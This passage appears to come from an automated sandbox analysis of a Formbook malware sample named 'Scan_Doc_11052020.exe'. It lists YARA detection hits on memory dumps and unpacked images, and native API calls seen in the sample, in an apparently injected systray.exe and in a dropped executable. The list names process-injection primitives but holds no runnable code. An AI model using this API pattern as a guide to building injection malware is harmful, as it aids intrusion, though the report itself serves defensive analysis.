Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Scan_Doc_11052020.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_05F0A5F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A560 NtQuerySystemInformation,LdrInitializeThunk,0_2_05F0A560
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A540 NtDelayExecution,LdrInitializeThunk,0_2_05F0A540
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A4A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_05F0A4A0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A480 NtMapViewOfSection,LdrInitializeThunk,0_2_05F0A480
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A410 NtQueryInformationToken,LdrInitializeThunk,0_2_05F0A410
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A750 NtCreateFile,LdrInitializeThunk,0_2_05F0A750
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A720 NtResumeThread,LdrInitializeThunk,0_2_05F0A720
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A700 NtProtectVirtualMemory,LdrInitializeThunk,0_2_05F0A700
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A6A0 NtCreateSection,LdrInitializeThunk,0_2_05F0A6A0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A610 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_05F0A610
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_05F0A3E0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A360 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_05F0A360
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A2D0 NtClose,LdrInitializeThunk,0_2_05F0A2D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A240 NtReadFile,LdrInitializeThunk,0_2_05F0A240
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A5A0 NtWriteVirtualMemory,0_2_05F0A5A0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0BD40 NtSuspendThread,0_2_05F0BD40
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A520 NtEnumerateKey,0_2_05F0A520
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0ACE0 NtCreateMutant,0_2_05F0ACE0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0B470 NtOpenThread,0_2_05F0B470
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A470 NtSetInformationFile,0_2_05F0A470
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A460 NtOpenProcess,0_2_05F0A460
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A430 NtQueryVirtualMemory,0_2_05F0A430
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0B410 NtOpenProcessToken,0_2_05F0B410
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A780 NtOpenDirectoryObject,0_2_05F0A780
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A710 NtQuerySection,0_2_05F0A710
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A6D0 NtCreateProcessEx,0_2_05F0A6D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A650 NtQueueApcThread,0_2_05F0A650
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0B0B0 NtGetContextThread,0_2_05F0B0B0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A800 NtSetValueKey,0_2_05F0A800
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A3D0 NtCreateKey,0_2_05F0A3D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A370 NtQueryInformationProcess,0_2_05F0A370
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A350 NtQueryValueKey,0_2_05F0A350
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A310 NtEnumerateValueKey,0_2_05F0A310
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A2F0 NtQueryInformationFile,0_2_05F0A2F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A260 NtWriteFile,0_2_05F0A260
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0BA30 NtSetContextThread,0_2_05F0BA30
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F0A220 NtWaitForSingleObject,0_2_05F0A220
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAACE0 NtCreateMutant,LdrInitializeThunk,4_2_04DAACE0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA480 NtMapViewOfSection,LdrInitializeThunk,4_2_04DAA480
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA470 NtSetInformationFile,LdrInitializeThunk,4_2_04DAA470
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA410 NtQueryInformationToken,LdrInitializeThunk,4_2_04DAA410
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA540 NtDelayExecution,LdrInitializeThunk,4_2_04DAA540
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_04DAA560
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA6A0 NtCreateSection,LdrInitializeThunk,4_2_04DAA6A0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04DAA610
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA750 NtCreateFile,LdrInitializeThunk,4_2_04DAA750
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA800 NtSetValueKey,LdrInitializeThunk,4_2_04DAA800
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA2D0 NtClose,LdrInitializeThunk,4_2_04DAA2D0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA240 NtReadFile,LdrInitializeThunk,4_2_04DAA240
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA260 NtWriteFile,LdrInitializeThunk,4_2_04DAA260
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA3D0 NtCreateKey,LdrInitializeThunk,4_2_04DAA3D0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04DAA3E0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA350 NtQueryValueKey,LdrInitializeThunk,4_2_04DAA350
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04DAA360
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_04DAA310
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA4A0 NtUnmapViewOfSection,4_2_04DAA4A0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAB470 NtOpenThread,4_2_04DAB470
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA460 NtOpenProcess,4_2_04DAA460
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAB410 NtOpenProcessToken,4_2_04DAB410
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA430 NtQueryVirtualMemory,4_2_04DAA430
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA5F0 NtReadVirtualMemory,4_2_04DAA5F0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA5A0 NtWriteVirtualMemory,4_2_04DAA5A0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DABD40 NtSuspendThread,4_2_04DABD40
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA520 NtEnumerateKey,4_2_04DAA520
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA6D0 NtCreateProcessEx,4_2_04DAA6D0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA650 NtQueueApcThread,4_2_04DAA650
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA780 NtOpenDirectoryObject,4_2_04DAA780
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA710 NtQuerySection,4_2_04DAA710
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA700 NtProtectVirtualMemory,4_2_04DAA700
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA720 NtResumeThread,4_2_04DAA720
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAB0B0 NtGetContextThread,4_2_04DAB0B0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA2F0 NtQueryInformationFile,4_2_04DAA2F0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DABA30 NtSetContextThread,4_2_04DABA30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA220 NtWaitForSingleObject,4_2_04DAA220
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DAA370 NtQueryInformationProcess,4_2_04DAA370
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36BC0 NtCreateFile,4_2_00B36BC0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36CF0 NtClose,4_2_00B36CF0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36C70 NtReadFile,4_2_00B36C70
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36DA0 NtAllocateVirtualMemory,4_2_00B36DA0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36CEA NtClose,4_2_00B36CEA
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36C6A NtReadFile,4_2_00B36C6A
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B36D9C NtAllocateVirtualMemory,4_2_00B36D9C
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A5F0 NtReadVirtualMemory,LdrInitializeThunk,14_2_05C0A5F0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A540 NtDelayExecution,LdrInitializeThunk,14_2_05C0A540
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A560 NtQuerySystemInformation,LdrInitializeThunk,14_2_05C0A560
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A480 NtMapViewOfSection,LdrInitializeThunk,14_2_05C0A480
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A4A0 NtUnmapViewOfSection,LdrInitializeThunk,14_2_05C0A4A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A410 NtQueryInformationToken,LdrInitializeThunk,14_2_05C0A410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A750 NtCreateFile,LdrInitializeThunk,14_2_05C0A750
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A700 NtProtectVirtualMemory,LdrInitializeThunk,14_2_05C0A700
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A720 NtResumeThread,LdrInitializeThunk,14_2_05C0A720
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A6A0 NtCreateSection,LdrInitializeThunk,14_2_05C0A6A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A610 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_05C0A610
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A3E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_05C0A3E0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A360 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_05C0A360
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A2D0 NtClose,LdrInitializeThunk,14_2_05C0A2D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A240 NtReadFile,LdrInitializeThunk,14_2_05C0A240
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A5A0 NtWriteVirtualMemory,14_2_05C0A5A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0BD40 NtSuspendThread,14_2_05C0BD40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A520 NtEnumerateKey,14_2_05C0A520
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0ACE0 NtCreateMutant,14_2_05C0ACE0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A460 NtOpenProcess,14_2_05C0A460
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0B470 NtOpenThread,14_2_05C0B470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A470 NtSetInformationFile,14_2_05C0A470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0B410 NtOpenProcessToken,14_2_05C0B410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A430 NtQueryVirtualMemory,14_2_05C0A430
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A780 NtOpenDirectoryObject,14_2_05C0A780
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A710 NtQuerySection,14_2_05C0A710
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A6D0 NtCreateProcessEx,14_2_05C0A6D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A650 NtQueueApcThread,14_2_05C0A650
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0B0B0 NtGetContextThread,14_2_05C0B0B0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A800 NtSetValueKey,14_2_05C0A800
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A3D0 NtCreateKey,14_2_05C0A3D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A350 NtQueryValueKey,14_2_05C0A350
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A370 NtQueryInformationProcess,14_2_05C0A370
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A310 NtEnumerateValueKey,14_2_05C0A310
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A2F0 NtQueryInformationFile,14_2_05C0A2F0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A260 NtWriteFile,14_2_05C0A260
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0A220 NtWaitForSingleObject,14_2_05C0A220
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C0BA30 NtSetContextThread,14_2_05C0BA30
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A560 NtQuerySystemInformation,LdrInitializeThunk,15_2_0578A560
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A540 NtDelayExecution,LdrInitializeThunk,15_2_0578A540
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_0578A5F0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A410 NtQueryInformationToken,LdrInitializeThunk,15_2_0578A410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_0578A4A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A480 NtMapViewOfSection,LdrInitializeThunk,15_2_0578A480
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A750 NtCreateFile,LdrInitializeThunk,15_2_0578A750
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A720 NtResumeThread,LdrInitializeThunk,15_2_0578A720
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_0578A700
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_0578A610
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A6A0 NtCreateSection,LdrInitializeThunk,15_2_0578A6A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_0578A360
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_0578A3E0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A240 NtReadFile,LdrInitializeThunk,15_2_0578A240
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A2D0 NtClose,LdrInitializeThunk,15_2_0578A2D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578BD40 NtSuspendThread,15_2_0578BD40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A520 NtEnumerateKey,15_2_0578A520
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A5A0 NtWriteVirtualMemory,15_2_0578A5A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578B470 NtOpenThread,15_2_0578B470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A470 NtSetInformationFile,15_2_0578A470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A460 NtOpenProcess,15_2_0578A460
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A430 NtQueryVirtualMemory,15_2_0578A430
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578B410 NtOpenProcessToken,15_2_0578B410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578ACE0 NtCreateMutant,15_2_0578ACE0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A710 NtQuerySection,15_2_0578A710
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A780 NtOpenDirectoryObject,15_2_0578A780
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0578A650 NtQueueApcThread,15_2_0578A650
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A6D0 NtCreateProcessEx,15_2_0578A6D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A800 NtSetValueKey,15_2_0578A800
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578B0B0 NtGetContextThread,15_2_0578B0B0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A370 NtQueryInformationProcess,15_2_0578A370
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A350 NtQueryValueKey,15_2_0578A350
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A310 NtEnumerateValueKey,15_2_0578A310
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A3D0 NtCreateKey,15_2_0578A3D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A260 NtWriteFile,15_2_0578A260
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578BA30 NtSetContextThread,15_2_0578BA30
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A220 NtWaitForSingleObject,15_2_0578A220
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A2F0 NtQueryInformationFile,15_2_0578A2F0
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\systray.exe, Code function: String function: 04D6B0E0 appears 176 times
Source: C:\Windows\SysWOW64\systray.exe, Code function: String function: 04DF5110 appears 38 times
